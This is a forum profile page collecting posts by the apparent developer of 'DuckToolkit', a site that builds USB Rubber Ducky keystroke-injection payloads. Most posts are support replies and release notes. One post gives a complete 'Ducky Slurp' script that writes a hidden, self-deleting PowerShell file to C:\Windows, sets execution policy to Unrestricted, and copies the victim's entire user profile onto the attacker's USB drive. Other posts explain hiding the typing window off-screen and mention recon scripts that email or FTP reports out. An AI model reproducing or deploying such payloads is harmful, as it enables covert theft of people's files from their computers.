Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

  • Days Won


Everything posted by 411Hall

  1. Try the code below. If your going to use CONTROL ALT with a command after you need to shorten it to CTRL-ALT. REM Logon DELAY 4000 CTRL-ALT DELETE STRING Computer_Password ENTER DELAY 500 REM Open Website CTRL-ALT a DELAY 500 REM Logon STRING Username TAB STRING Site_Password ENTER DELAY 500 REM Maximize Screen WINDOWS UPARROW
  2. All fixed now, thank you for the heads up :)
  3. What Language are you using? ymode will appear when the commands ALT y, DELAY 1000, STRING mode con:cols=14 lines=1 are not recognised. I have no idea why its saying PowerShell.exe isnt a valid executable. Can run it manually from Windows Key + R?
  4. Thanks! Do any of the other encoders currently support swedish layout? If they do I can just modify it to work with the toolkit
  5. Hello everyone. Sorry for the delay in replies and issues with the previous site over the past few months. I am happy to announce that the DuckToolkit NG is now available! This is an entirely new version of the previous site which has been rewritten in Python/Django by myself and KevtheHermit. Current Features: Online Encoder 30+ Recon/Exploit/Reporting PowerShell scripts Online Decoder UK/US Language Support Standalone Python Encoder/Decoder We are working to add new languages and to implement Linux/OSX scripts in the coming weeks, however since this in an open source project please feel free to help us! If you want a certain language added then help us by writing it! You can access the online DuckToolkit NG here: https://www.ducktoolkit.com You can access the standalone DuckToolkit here: https://github.com/kevthehermit/DuckToolkit Any issues, comments or suggestions then either post on the Disqus thread on the website or respond in this thread, 411.
  6. Sorry for the downtime everyone. The old site is now back up. I am working on a new site and have moved the old site to a new hosting provider and have had a few issues. Hoping to have the new site up and running by April! It will be worth the wait! 411.
  7. Hi mate, yeah no worries. Send me the .txt, .bin and .ps1 file and i will have a look. It might also be worth launching the PowerShell.exe on your Windows box, navigating to the .ps1 file and attempting to run it from command line. That will show you if there any errors when it attempts to run. I will be away for the weekend btw so wont be able to look until Monday. Cheers, 411.
  8. Hi Ardetroya, sorry for not replying sooner i have only just seen this post! Do you have a copy of the properties file? I will update asap. Thanks, 411.
  9. Just a heads up. I have updated the encoder on the Toolkit to 2.6.3. Hoping this will fix the issues users have been having with the Encoder. Any issues let me know. 411.
  10. Yeah sorry about that, appears the site ran out of space even though that should never happen. Its back up now. 411.
  11. This is awesome! As its Java based would you consider some type of collaboration so we could try and get this onto the Duck Toolkit? Obviously full credit would go to you!.
  12. Hi nazgul, sorry you are having issues! Would you mind sending the .txt and .bin payloads to ducktoolkit@outlook.com so i can have a look? There is definitely something wrong as the PowerShell file should be hidden in C:\Windows. 411.
  13. Hi xyntax sorry for the delay in my reply. I believe there is an issue with the italian keyboard layout in the latest encoder as you are not the only person to report this to me. The down arrows are there to pull the notepad off screen. The amount of down arrows required to get the notepad off screen vary depending on screen resolution. Since i dont know the users screen resolution i have included more that should be would probably be necessary to ensure the notepad is always hidden. 411.
  14. Nice work, looks really extensive! Havent got my ducky with me know but i will run it as soon as i get chance. 411.
  15. Soo did it not run? What operating system are you running? 411.
  16. I have added a new delay feature to the Toolkit. Now you can specify exactly how much delay you want on each script, this should prevent any run time errors with the scripts trying to execute faster than the target computer can handle. 411.
  17. Have you tried again since i added the new delay feature? You now choose exactly how much delay is on each script. So maybe try setting it to the max to see if that runs? If it does then it has to be a timing issue. 411.
  18. In response to this yes that wouldn't be a problem at all. I will probably append a time stamp to the report name so 'Report 08:00:00 07.05.2014.zip' That work for you? I will make the changes over the next weekend. As for PowerShell as Merlintime has pointed out its incredibly powerful and there are loads of ways you can remotely administer machines. When i was writing the Toolkit i discovered loads of awesome uses for it but i decided to leave remotely networked machines out of the scope as there are certain variables i wouldn't know. Anyway i have all of my PowerShell scripts minus the Duck code stored somewhere so if you want them let me know. Also let me know if you write anything you think could be a good payload. Im always looking for new scripts! 411.
  19. Hi sorry for the dely in my reply. So do you ever see notepad open and the script being typed out? If not I am thinking that the delay on the scripts may be too little and therfore the ducky is typing faster than the PC can handle. Let me know, I am working on a solution to this that should be released in a few weeks but there is a work around we can do in the mean time. 411.
  20. No tailing slashes or anything needed. If you dont mind PMing me the details will probably be the quickest way to sort it. Sorry about that 411.
  21. Sorry about the issues mate. I just tried putting in: ftp://username:pass@example.com That worked fine for me. Are you by chance adding brackets on either side? If so don't! Not really too sure why i added to the example tbh so I will remove during next update. Hope that fixes it. 411.
  22. Sorry about that mate. Its exactly what Merlintime said, nice one btw! The PowerShell file which is created when the script is deployed is called config.ps1, this is saved in the C:\Windows folder. The file will erase itself after completion. So that fact that its still there means the script you run before has either errored or hasn't completed. Have you by chance run the Twin Duck script? I seem to remember that doesn't finish for a very very long time even after alot of the files have been copied to the USB. Anyway its a simple enough fix. I will make sure that future scripts overwrite the config.ps1 file if its present. Should be able to push the changes out by the weekend. Issue is now fixed. Thanks for using the Toolkit and sorry about the issues. 411.
  23. If your interested I have a slighty different version of the Ducky Slurp. Same premise as Darrens and Overwraiths just written in PowerShell. DELAY 3000 GUI r DELAY 750 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 ENTER ALT SPACE DELAY 100 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\' ENTER STRING $usbPresent = 'False' ENTER STRING do { ENTER STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | Measure ENTER STRING if ($present.Count -ge 1){ ENTER STRING $usbPresent = 'True' }Else { ENTER STRING $usbPresent = 'False'}} ENTER STRING until ($usbPresent -eq 'True') ENTER STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select Name ENTER STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select name ENTER STRING copy-item $userDir $usbPath.Name -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1500 STRING C:\Windows\config.ps1 ENTER DELAY 2000 ALT F4 DELAY 200 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 100 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 1000 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER There is also a USB Reporting method on the Duck Toolkit. 411.
  24. Version 2 of the Duck Toolkit is now online! v.2 Changes: New UI USB Reporting Payload Duck Slurp Payload Fixed Encoder Issues USB Recon Script Updated Fixed Other Backend Issues Check it out at http://www.ducktoolkit.com Feedback is always appreciated. Also I really want to get some fresh scripts on the site in the coming weeks so if anyone has any requests just message me. Enjoy, 411.
  25. Hey mate, Sorry about that. I have just tested the script and it worked for me, I am assuming you have checked Junk folders etc? (I have to ask) I think you may be having one of two possible issues: 1. Its possible that either the 'Report.zip' isn't ever being created so it can be uploaded and sent via email, that would cause the script to crash. 2 . SMTP (port 25) may be blocked on your firewall which is preventing the script from being sent. However I have never had this issue and I have tried on several computers with different firewalls etc. First thing i would try is disabling any firewalls etc and doing a test run, if the email arrives then problem sorted. Although i will need to fix that issue. If that doesn't work then its probably a 'Report.zip' issue. Could you try making a recon script and select the 'Save Report to Target Machine' option, enter a folder directory for the file to save too and run the script. That will let me know if the zip creation functionality is working on your computer. Sorry for the issues, 411.
  • Create New...